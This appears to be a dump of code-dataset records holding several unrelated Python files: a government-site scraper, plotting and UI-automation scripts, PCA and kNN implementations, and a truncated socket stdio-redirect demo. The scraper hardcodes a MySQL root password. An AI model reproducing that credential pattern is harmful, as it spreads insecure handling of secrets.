"call"}, {"api_name": "resfgb.models.layers", "line_number": 51, "usage_type": "name"}, {"api_name": "resfgb.models.layers.FullConnect", "line_number": 58, "usage_type": "call"}, {"api_name": "resfgb.models.layers", "line_number": 58, "usage_type": "name"}, {"api_name": "theano.tensor.arange", "line_number": 59, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 59, "usage_type": "name"}, {"api_name": "theano.tensor.mean", "line_number": 60, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 60, "usage_type": "name"}, {"api_name": "theano.tensor.sum", "line_number": 60, "usage_type": "call"}, {"api_name": "theano.tensor.nnet.softplus", "line_number": 60, "usage_type": "call"}, {"api_name": "theano.tensor.nnet", "line_number": 60, "usage_type": "attribute"}, {"api_name": "theano.tensor.argmax", "line_number": 62, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 62, "usage_type": "name"}, {"api_name": "theano.tensor.sum", "line_number": 67, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 67, "usage_type": "name"}, {"api_name": "theano.tensor.sum", "line_number": 69, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 69, "usage_type": "name"}, {"api_name": "logging.ERROR", "line_number": 71, "usage_type": "argument"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}, {"api_name": "theano.tensor.grad", "line_number": 75, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 75, "usage_type": "name"}, {"api_name": "resfgb.optimizers.AGD", "line_number": 81, "usage_type": "call"}, {"api_name": "theano.function", "line_number": 97, "usage_type": "call"}, {"api_name": "theano.function", "line_number": 98, "usage_type": "call"}, {"api_name": "theano.function", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "404671322", "text": "import re\nimport requests\nfrom fake_useragent import UserAgent\nfrom lxml import etree\nimport pymysql\n\n\nclass Mz():\n def __init__(self):\n self.headers = {'User-Agent': UserAgent().random}\n self.url = 'http://www.mca.gov.cn/article/sj/xzqh/2019/'\n self.db = pymysql.connect('localhost', 'root', '990430', 'spider_db', charset='utf8')\n self.cursor = self.db.cursor()\n\n def get_html(self, url):\n\n html = requests.get(url=url, headers=self.headers).text\n return html\n\n def parasm_html(self):\n one_html = self.get_html(url=self.url)\n par = etree.HTML(one_html)\n url_list = par.xpath('//a[contains(@title,\"中华人民共和国县以上行政区划代码\")]/@href')\n two_url = 'http://www.mca.gov.cn' + url_list[0]\n print(two_url)\n two_html = self.get_html(two_url)\n p = re.compile('window.location.href=\"(.*?)\"', re.S)\n two_list = p.findall(two_html)[0]\n print(two_list)\n # 判断url是否需要爬取\n p = self.write_db(two_list)\n if p:\n three_html = self.get_html(two_list)\n self.xpath_two(three_html)\n else:\n print('无更新')\n\n def xpath_two(self, html):\n par_two = etree.HTML(html)\n two_list_area = par_two.xpath('//td[@class=\"xl718256\"]/text()')\n # print(two_list)\n # 区县数据\n l = self.Adjust_the_data(two_list_area)\n # counties区县表名\n self.insert_id('counties',l)\n # 市数据\n two_list_The_city = par_two.xpath('//td[@class=\"xl708256\"]/text()')\n l2 = self.Adjust_the_data(two_list_The_city)\n self.insert_id('province',l2)\n\n\n def insert_id(self,grade,data):\n sql = 'insert into '+grade+'(编号,地区) values (%s,%s)'\n try:\n self.cursor.executemany(sql,data)\n self.db.commit()\n except Exception as e:\n print(e)\n self.db.rollback()\n\n\n\n\n\n def write_db(self, data):\n sql = 'select * from url where url=%s'\n d = self.cursor.execute(sql,[data,])\n if not d:\n try:\n insert_sql = 'insert into url(url) values (%s)'\n self.cursor.execute(insert_sql, [data,])\n self.db.commit()\n return True\n except:\n self.db.rollback()\n print('10010')\n return False\n\n def Adjust_the_data(self, list):\n n = 0\n l = []\n while 1:\n try:\n l.append((list[n], list[n + 1]))\n n += 2\n except:\n break\n return l\n\n def run(self):\n self.parasm_html()\n\n\nif __name__ == '__main__':\n spider = Mz()\n spider.run()\n", "sub_path": "day04/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 2762, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "fake_useragent.UserAgent", "line_number": 10, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 22, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 22, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.S", "line_number": 27, "usage_type": "attribute"}, {"api_name": "lxml.etree.HTML", "line_number": 39, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "461020926", "text": "\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button, RadioButtons\nfrom math import floor, ceil\n\nfrom data_proc import *\n\nbmp = ms_ds.copy()\nbins = pd.cut(ms_ds['year'].map(lambda x: int(x)), 10)\nbmp['db'] = bins\nbmp['count'] = 1\n\nubins = bins.unique()[::-1]\n\ndef calc_max():\n\treturn bmp.groupby(['db', 'month'])['count'].sum().max()\n\nmax_value = calc_max()\n\ndef bin_text_repr(b):\n\tnlow = int(ceil(b.left))\n\tnhigh = int(floor(b.right))\n\treturn \"[{}, {}]\".format(nlow, nhigh)\nbins_txt = map(bin_text_repr, ubins)\n\ndef for_year_bin(bin_id):\n\tbmpy = bmp[bmp['db'] == ubins[bin_id]]\n\tby_month = bmpy.groupby(['month']).sum()\n\tby_month = by_month[['Fatalities', 'Injured', 'Total victims', 'count']]\n\treturn by_month\n\nfig, ax = plt.subplots()\nplt.subplots_adjust(bottom=0.25)\n\n# (h_left, v_left, len, height)\nax_year = plt.axes([0.15, 0.1, 0.65, 0.03])\ns_year = Slider(ax_year, 'Year', 0, len(ubins) - 0.1, valfmt = \"%d\")\n\nscale_fixed = False\nbtn_ax = plt.axes([0.8, 0.025, 0.1, 0.04])\nbtn_fix_scale = Button(btn_ax, 'Fix scale', hovercolor='0.975')\n\ndef plot(bin_id):\n\tdata = for_year_bin(bin_id)\n\n\tax.clear()\n\t\n\tax.set_xticks(range(1,13))\n\tax.set_xlim([0,13])\n\tif scale_fixed:\n\t\tax.set_ylim([0, max_value+1])\n\n\ts_year.valtext.set_text(bins_txt[bin_id])\n\n\tax.bar(data.index, data['count'])\n\tfig.canvas.draw_idle()\n\ndef update(val):\n\tbin_id = int(s_year.val)\n\tplot(bin_id)\n\ndef on_fix_button_click(event):\n\tglobal scale_fixed\n\tscale_fixed = not scale_fixed\n\tupdate(\"\")\n\ns_year.on_changed(update)\nbtn_fix_scale.on_clicked(on_fix_button_click)\n\nplot(0)\n\nfig.canvas.draw()\nplt.show()", "sub_path": "preliminary-analysis/i_y_count.py", "file_name": "i_y_count.py", "file_ext": "py", "file_size_in_byte": 1601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "math.ceil", "line_number": 21, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.widgets.Button", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}]}
+{"seq_id": "486889197", "text": "# -*- coding: UTF-8 -*-\r\nimport random\r\n\r\nimport time\r\n\r\nfrom utils.utils import Utils\r\n\r\n\r\nclass Qplay:\r\n\r\n def __init__(self):\r\n global d\r\n d = Utils().get_device_obj()\r\n\r\n if not 'pateo.dls.qplay'.__eq__(d.info['currentPackageName']):\r\n Utils().raise_Exception_info('当前界面和预期界面不一致')\r\n\r\n # 获取本地音乐控件\r\n def __get_qplay_selector_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:drawable/selector_menu_local')\r\n # 获取qplay本地歌曲窗口\r\n def __get_qplay_local_drawer_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:id/drawer')\r\n\r\n # 获取音乐名称控件\r\n def __get_qplay_local_name_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:id/drawer_list_category_text')\r\n\r\n # 获取当前播放的控件名称\r\n def __get_qplay_play_name_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:id/title')\r\n # 获取qplay返回主界面控件\r\n def __get_qplay_home_ele(self):\r\n return Utils().get_ele_by_resourceId('pateo.dls.qplay:drawable/selector_button_home')\r\n # 点击本地音乐选择控件\r\n def click_qplay_selector_ele(self):\r\n ele = self.__get_qplay_selector_ele()\r\n if ele.wait.exists():\r\n ele.click.wait()\r\n else:\r\n Utils().raise_Exception_info('本地音乐选择控件不存在')\r\n # 获取当前播放的音乐名称\r\n def get_qplay_play_name(self):\r\n ele = self.__get_qplay_play_name_ele()\r\n if ele.exists:\r\n return ele.text.strip()\r\n else:\r\n Utils().raise_Exception_info('当前没有音乐播放')\r\n # 点击返回主界面\r\n def click_qplay_home_ele(self):\r\n ele = self.__get_qplay_home_ele()\r\n if ele.exists:\r\n ele.click.wait()\r\n else:\r\n Utils().raise_Exception_info('qplay返回主界面控件不存在')\r\n\r\n #随机播放qplay本地音乐\r\n def click_qplay_local_name_random(self):\r\n # 判断是否已经播放音乐\r\n ele_name = self.__get_qplay_local_drawer_ele()\r\n if not ele_name.exists:\r\n self.click_qplay_selector_ele()\r\n # 随机选择\r\n ele = self.__get_qplay_local_name_ele()\r\n if ele.wait.exists() > 0:\r\n size = len(ele)\r\n idx = random.randint(0, size - 1)\r\n name = ele[idx].text.strip()\r\n ele[idx].click.wait()\r\n return name\r\n else:\r\n Utils().raise_Exception_info('qplay音乐列表为空')\r\n\r\n # 隐藏qplay本地歌曲窗口\r\n def hide_qplay_local_drawer_ele(self):\r\n ele = self.__get_qplay_local_drawer_ele()\r\n if ele.exists:\r\n # 获取窗口坐标\r\n x = ele.info['bounds']['right']\r\n y = int(ele.info['bounds']['bottom']) / 2\r\n # 滑动隐藏\r\n d.swipe(x, y, 0, y, 30)\r\n else:\r\n Utils().raise_Exception_info('qplay本地歌曲窗口不存在')\r\n\r\n # 验证当前是qplay初始界面\r\n def check_qplay_init(self):\r\n # 等待3s\r\n time.sleep(3)\r\n if not d(text = '连接QPlay').wait.exists():\r\n Utils().raise_Exception_info('当前不是QPlay初始界面')\r\n # 从音乐界面返回到launcher界面\r\n\r\n def back_to_launcher(self):\r\n # 判断是否在我的音乐库或音乐列表界面或者酷我,今日歌单\r\n if self.__get_qplay_local_drawer_ele().exists:\r\n self.hide_qplay_local_drawer_ele()\r\n self.click_qplay_home_ele()\r\n else:\r\n self.click_qplay_home_ele()\r\n", "sub_path": "autotestproject/actions/qplay.py", "file_name": "qplay.py", "file_ext": "py", "file_size_in_byte": 3692, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "utils.utils.Utils", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 48, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 55, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "utils.utils.Utils", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "144159754", "text": "\"\"\"\nBase class for PCA objects\n\"\"\"\n\nimport numpy as N\nfrom scipy.optimize import leastsq\nimport logging\n\nclass PCA(object):\n \"\"\"\n Base object for PCA algorithms. Defines property accessors like\n x.mean and x.eigenvectors . Specific PCA implementations will\n extend this to provide the actual PCA algorithm. This class is\n not useable as-is; use a subclass like EM_PCA or WeightedCovPCA.\n \"\"\"\n\n @property\n def model(self):\n \"\"\"Model object to access the eigenvectors, projections, etc.\"\"\"\n return self._model\n\n @property\n def mean(self):\n \"\"\"Mean of input data\"\"\"\n return self._mean\n\n @property\n def var(self):\n \"\"\"Variance of input data\"\"\"\n return self._var\n\n @property\n def eigenvalues(self):\n \"\"\"PCA Eigenvalues\"\"\"\n return self._eigenvalues\n\n @property\n def eigenvectors(self):\n \"\"\"PCA Eigenvectors\"\"\"\n return self._eigenvectors\n\n def project(self, data, var=None, nvec=None):\n \"\"\"\n Return the projection coefficients. If nvec is None, return\n as many coefficients as we have eigenvectors.\n \n Input:\n data[nobs, nvar] or data[nvar]\n \n Optional Inputs:\n var[nobs, nvar] or var[nvar] - variance of data\n nvec - number of eigenvectors to use\n \n Returns:\n c[nobs, nvec] or c[nvec] - projection coefficients\n c_cov[nobs, nvec,nvec] - projection coefficient covariance\n or c_cov[nobs, nvec, nvec]\n \"\"\"\n\n #- Internal function to calculate (model - data)/weight\n def _func(coeffs, basis, data, weight) :\n return weight * ( N.dot(basis.T, coeffs) - data.T )\n\n #- Basic setup; recast to masked arrays; create missing args\n if nvec is None:\n nvec = len(self.eigenvalues)\n \n if var is None:\n var = N.ma.ones(data.shape)\n else:\n var = N.ma.array(var)\n\n #- check data[nvar] vs. data[nobs, nvar]\n #- recursively call with (1 x nvar) arrays; cast back to 1D\n if len(data.shape) == 1:\n data = N.ma.atleast_2d(data)\n var = N.ma.atleast_2d(var)\n c, cov = self.project(data, var=var, nvec=nvec)\n return c[0], cov[0]\n\n nobs, nvar = data.shape\n xdata = N.ma.array(data) - self.mean\n\n all_coeff = list()\n all_cov = list()\n c0 = N.zeros(nvec)\n for iobs, (x, v) in enumerate(zip(xdata, var)):\n logging.debug('Projecting observation %d' % iobs)\n coeff = N.nan * N.ones( nvec )\n cov = N.nan * N.ones( ( nvec, nvec ) )\n if x.any() :\n weight = 1.0/N.sqrt(v)\n basis = self.eigenvectors[0:nvec]\n args = (basis, x, weight)\n ### import code; code.interact(local=locals())\n # print 'project', iobs\n coeff, cov = leastsq(_func, c0, args, full_output=True)[0:2]\n d2 = _func(coeff, basis, x, weight )**2\n chi2dof = d2.sum() / float(x.count() - nvec)\n cov *= chi2dof\n all_coeff.append(coeff)\n all_cov.append(cov)\n\n return N.array(all_coeff), N.array(all_cov)\n\n\n def reconstruct(self, coeffs, cov=None):\n \"\"\"\n Given a set of coefficients (and optionally their covariance),\n return the reconstruction using the current set of eigenvectors.\n \n Input:\n coeff[nobs, nvec] or coeff[nvec]\n \n Optional:\n cov[nobs, nvec, nvec] or cov[nvec, nvec]\n \n Returns:\n reconstruction[nvar] or reconstruction[nobs, nvar]\n reconstruction_var[nvar] or [nobs, nvar]\n \n if cov is provided as input, returns recon, recov\n \n TODO: Check if errors are really right. They don't depend upon\n the values of the coefficients, which doesn't seem right,\n unless the covariance of the coefficients already effectively\n contains that info.\n \"\"\"\n\n #- check data[nvar] vs. data[nobs, nvar]\n #- recursively call with (1 x nvar) arrays; cast back to 1D\n if len(coeffs.shape) == 1:\n coeffs = N.ma.atleast_2d(coeffs)\n if cov is None:\n recon = self.reconstruct(coeffs)\n return recon[0]\n else:\n cov = N.ma.array( (cov,) )\n recon, recov = self.reconstruct(coeffs, cov)\n return recon[0], recov[0]\n\n nobs, nvec = coeffs.shape\n recon = list()\n for i, c in enumerate(coeffs):\n ### print 'reconstruct', i\n if all( c == c ) :\n recon.append(self.mean + N.dot(self.eigenvectors[0:nvec].T, c))\n else :\n recon.append(N.nan * N.ones_like(self.mean))\n \n recon = N.array(recon)\n \n recov = list()\n if cov is not None:\n ### print 'Calculating reconstruction covariance'\n A = self.eigenvectors[0:nvec]\n for c, V in zip(coeffs, cov):\n U = N.dot(A.T, N.dot(V, A) )\n recov.append(U)\n recov = N.array(recov)\n \n return recon, recov\n else:\n return recon\n \n\n", "sub_path": "src/xpca/pca.py", "file_name": "pca.py", "file_ext": "py", "file_size_in_byte": 5440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.dot", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.ma.ones", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.ma.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.ma.atleast_2d", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 76, "usage_type": "attribute"}, {"api_name": "numpy.ma.atleast_2d", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.ma.array", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 92, "usage_type": "call"}, {"api_name": "scipy.optimize.leastsq", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.ma.atleast_2d", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.ma.array", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "33214013", "text": "\"\"\"\n Написать функцию, которая возводит число a в степень b.\n\"\"\"\nfrom utils import get_int\n\n\ndef main():\n print(\"Enter x:\", end=\" \")\n x = get_int()\n print(\"Enter y:\", end=\" \")\n y = get_int()\n\n result = pow_(x, y)\n print(f\"{x} ^ {y} = {result}\")\n\n\ndef pow_(x: int, y: int) -> int:\n return x ** y\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "Lesson_05/_6_practice_pow.py", "file_name": "_6_practice_pow.py", "file_ext": "py", "file_size_in_byte": 402, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "utils.get_int", "line_number": 9, "usage_type": "call"}, {"api_name": "utils.get_int", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "44026576", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright () 2018\nAll rights reserved\n\nFILE: alg_knn.py\nDATE CREATED: @Time : 2018/2/25 10:25\n\nDESCRIPTION: k-近邻算法\n1. 该算法是用来进行分类的算法\n2. 通过计算要进行分类的数据与已知类别的数据之间的距离,确定出k个近邻的数据,然后判断这k个近邻数的类别,选择出现次数最多的类别作为要进行\n 分类的数据的类别\n3. 常用的来计算要进行分类的数据与已知类别数据之间距离的方法:\n (1)\n (2)\n4.\n\nVERSION: : #1 \nCHANGE: :\nMODIFIED: : @Time : 2018/2/25 10:25\n\"\"\"\nimport numpy as np\nimport operator # 运算符模块\n\n\ndef create_dataset():\n \"\"\"\n 创建数据集合和标签\n :return:\n \"\"\"\n group = np.array([[1.0, 1.1], [1.0, 1.0], [0, 0], [0, 0.1]])\n labels = ['A', 'A', 'B', 'B']\n return group, labels\n\n\ndef classify0(in_data, dataset, labels, k):\n \"\"\"\n k-NN算法实现:\n (1)计算已知类别数据集中的点与当前点的距离\n (2)按照距离递增排序\n (3)选取距离最小的k个点\n (4)确定k个点所在类别出现的概率\n (5)返回k个点出现频率最高的类别\n return: 返���in_data所属类别\n \"\"\"\n # 计算已知类别数据集中的点与当前点的距离, 采用欧式距离, 两点间的距离公式:((x0 - x1)**2 + (y0 - y1)**2)**0.5\n dataset_size = dataset.shape[0]\n diff_mat = np.tile(in_data, (dataset_size, 1)) - dataset\n sq_diff_mat = diff_mat ** 2\n sq_distance = sq_diff_mat.sum(axis=1)\n distances = sq_distance ** 0.5 # 得到已知类别中的每一个点和当前点的距离: [ 0.28284271 0.36055513 1.7691806 1.69705627]\n sorted_distaces_indices = distances.argsort() # 得到距离的排序:[0 1 3 2]\n # 选取与当前距离最小的k个点\n class_count = {}\n for i in range(k):\n vote_label = labels[sorted_distaces_indices[i]]\n class_count[vote_label] = class_count.get(vote_label, 0) + 1\n # 排序\n sorted_class_count = sorted(class_count.items(), key=operator.itemgetter(1), reverse=True)\n\n return sorted_class_count[0][0]\n\n\ndef classify1(in_data, data_set, label, k):\n \"\"\"\n 计算空间两个点之间的余弦距离\n \"\"\"\n n = data_set.shape[0]\n new_in_data = np.tile(in_data, (n, 1))\n a = data_set * new_in_data\n enominator_num = a.sum(axis=1)\n denominator_num = (new_in_data * new_in_data).sum(axis=1) * (data_set * data_set).sum(axis=1)\n value = enominator_num / denominator_num\n # 排序距离\n print(value)\n\n\ndef file2matrix(filename):\n \"\"\"\n 约会数据处理,将数据处理成矩阵\n \"\"\"\n with open(filename, 'r') as f:\n lines = f.readlines()\n length = len(lines)\n data_matrix = np.zeros((length, 3))\n data_labels = []\n index = 0\n for line in lines:\n list_from_line = line.strip().split()\n data_matrix[index, :] = list_from_line[0:3] # ndarry的索引:index表示第几行,第二个参数为对index进行索引\n data_labels.append(int(list_from_line[-1]))\n index += 1\n return data_matrix, data_labels\n\n\ndef analyse_data_by_plot(datas, label):\n \"\"\"\n 使用散点图进行数据分析\n \"\"\"\n import matplotlib.pyplot as plt\n fig = plt.figure() # 创建一个新的fingure\n ax = fig.add_subplot(111)\n ax.scatter(datas[:, 1], datas[:, 2], 15.0 * np.array(label), 15.0 * np.array(label))\n plt.xlabel('time play game')\n plt.ylabel('ice cream consume')\n plt.show()\n\n\ndef auto_norm(datas):\n \"\"\"\n 对数据进行归一化处理\n newvalue = (oldvalue - min) / (max - min)\n \"\"\"\n min_values = datas.min(0) # 获取datas中的每一列中的最小值, 返回该一维数组\n max_values = datas.max(0) # 获取datas中的每一列中的最大值,返回该一维数组\n ranges = max_values - min_values\n norm_datas = np.zeros(np.shape(datas))\n m = datas.shape[0] # 获取datas的shape,等价于np.shape(datas), m = 1000\n norm_datas = datas - np.tile(min_values, (m, 1)) # tile用来创建一个新的ndarray,重复min_value m次,每行数据重复1次\n norm_datas = norm_datas / np.tile(ranges, (m, 1))\n\n return norm_datas, ranges, min_values\n\n\ndef dating_class_test():\n \"\"\"\n 测试分类器的效果,得到分类器的错误率\n \"\"\"\n error_rate = 0.1\n dating_data, dating_labels = file2matrix(\n '/Users/jiale/workplace/practice/machine_learning/machinelearninginaction/Ch02/datingTestSet2.txt')\n norm_mat, ranges, min_value = auto_norm(dating_data)\n m = norm_mat.shape[0]\n num_test_vec = int(m * error_rate)\n error_count = 0\n for i in range(num_test_vec):\n classifier_result = classify0(norm_mat[i, :], norm_mat[num_test_vec:m, :], dating_labels[num_test_vec:m], 4)\n print('the classifier came back with {RESULT}, the real answer is {LABELS}'.format(RESULT=classifier_result,\n LABELS=dating_labels[i]))\n if classifier_result != dating_labels[i]:\n error_count += 1\n error_rate = error_count / float(num_test_vec)\n print('the total error rate is {RATE}'.format(RATE=error_rate))\n\n\nif __name__ == \"__main__\":\n group, labels = create_dataset()\n # 待分类数据\n in_data = np.array([1.2, 1.3])\n # 获取in_data的类别\n # classify1(in_data, group, labels, 2)\n # 使用k近邻算法进行约会网站配对效果改进\n import os\n\n current_folder = os.path.dirname(__file__) # 获取当前文件的目录\n folder = os.path.join(current_folder, '../../machine_learning/machinelearninginaction/Ch02/datingTestSet2.txt')\n real_path = os.path.abspath(folder)\n a = os.path.exists(real_path)\n data, labels = file2matrix(real_path)\n # analyse_data_by_plot(data, labels)\n # 进行数据的归一化\n norm_datas, ranges, min_values = auto_norm(data)\n # 测试分类器效果, 检测分类器的错误率\n dating_class_test()\n", "sub_path": "practice_alg/alg_knn.py", "file_name": "alg_knn.py", "file_ext": "py", "file_size_in_byte": 6082, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 49, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}]}
+{"seq_id": "92554024", "text": "#!/usr/bin/env python\n#-*-coding:utf-8\n\nimport sys,os,multiprocessing\nfrom socket_stream_redirect import *\n\n#redirect client output\ndef server1():\n\tmypid = os.getpid()\t\n\tconn = initListenerSocket()\n\tfile = conn.makefile('r')\t\n\tfor i in range(3):\n\t\tdata = file.readline().rstrip()#read/recv client's prints\t\t\n\t\tprint('server %s got: %s' % (mypid,data))\ndef client1():\n\tmypid = os.getpid()\n\tredirectOut()#返回一个socket,带有“写”的功能。\n\tfor i in range(3):\n\t\tprint('[client %s: %s]' %(mypid,i))#print to socket\n\t\tsys.stdout.flush()\n#redirect client input\ndef server2():\n\tmypid = os.getpid()\n\tconn = initListenerSocket()\n\tfor i in range(3):\n\t\tdata = 'server %s :%s\\n' % (mypid,i)\n\t\tconn.send(data.encode())\ndef client2():\n\tmypid = os.getpid()\n\tredirectIn()\n\tfor i in range(3):\n\t\tdata = input()#input from socket.\n\t\tprint('client %s got: %s' % (mypid,data))\n\t\t\n#redirect client input +output, client is socket client\ndef server3():\n\tmypid = os.getpid()\n\tconn = initListenerSocket()\n\tfile = conn.makefile('r')\n\tfor i in range(3):\n\t\tdata = file.readline().rstrip()\n\t\tconn.send(('server %s got [%s]\\n' % (mypid,data)).encode())\n\t\t\ndef client3():\n\tmypid = os.getpid()\n\tredirectBothAsClient()\n\tfor i in range(3):\n\t\tprint('client %s:%s ' % (mypid,i))\n\t\tdata = input()\n\t\tsys.stderr.write('client %s got [%s]\\n' % (mypid,data))\n\t\n\ndef server4():\n#有问题\n\tmypid = os.getpid()\n\tsock = socket(AF_INET,SOCK_STREAM)\n\tprint(host,port)\n\tsock.connect((host,port))\n\tfile = sock.makefile('r')\n\tfor i in range(3):\n\t\tsock.send(('server %s: %s\\n' % (mypid,i)).encode())\n\t\tdata = file.readline().rstrip()\n\t\tprint('server %s got [%s]' % (mypid,data))\n\t\t\ndef client4():\n\tmypid = os.getpid()\n\tredirectBothAsClient()\n\tfor i in range(3):\n\t\tdata = input()\n\t\tprint('client %s got [%s]' % (mypid,data))\n\t\tsys.stdout.flush()\ndef server5():\n\tmypid = os.getpid()\n\tconn = 